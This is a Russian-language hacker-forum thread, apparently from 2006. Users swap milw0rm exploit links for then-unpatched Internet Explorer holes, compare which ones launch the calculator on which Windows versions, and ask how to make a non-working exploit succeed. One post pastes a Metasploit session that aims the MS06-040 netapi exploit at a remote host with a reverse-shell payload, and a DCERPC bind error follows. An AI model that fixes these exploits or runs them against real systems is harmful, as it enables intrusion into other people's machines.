Нашел новые сплойты на MS IE, на которые еще нет заплатки. Работает на ура вот это, калькулятор запускает. На Win2000 IE вырубается, но калькулятора не дает:
http://milw0rm.org/exploits/2425
Это компилится, но мою винду не цепляет, хотя на ту же дыру
http://milw0rm.org/exploits/2403

как подправить второй сплойт так, что бы он работал на ура как и первый?

Мерси всем, кто раздуплит.

http://milw0rm.org/exploits/2425 - тестанул вот этот, осел вылетел и запустилось 2 (два) калькулятора (XP SP2)

Затестил сплоит от jamikazu - работает на SP2+IE
Провериться на запуск калькулятора можно Тут (http://vulnerabilitywmf.narod.ru/ms06_040.html)

А от метасплоита что-то не пашет (удалённый)

msf > cd framework
msfconsole: chdir: changed to directory framework
msf > use netapi_ms06_040
msf netapi_ms06_040 > set RHOST хх.хх.хх.2
RHOST -> хх.хх.хх.2
msf netapi_ms06_040 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set LHOST хх.хх.хх.1
LHOST -> хх.хх.хх.1
msf netapi_ms06_040(win32_reverse) > exploit

Starting Reverse Handler.

WARNING: Failed to create pipe to \BROWSER: Create returned NT status 0xc0000034 at /home/framework/lib/Pex/DCERPC.pm line 869.

Could not bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:хх.хх.хх.2[\BROWSER]

Exiting Reverse Handler.
msf netapi_ms06_040(win32_reverse) >

Что то не так в либе DCERPC.pm ? (или она старой версии?)

Сегдня вышел UPDATE заплатки на VML
http://www.microsoft.com/athome/security/update/bulletins/200609.mspx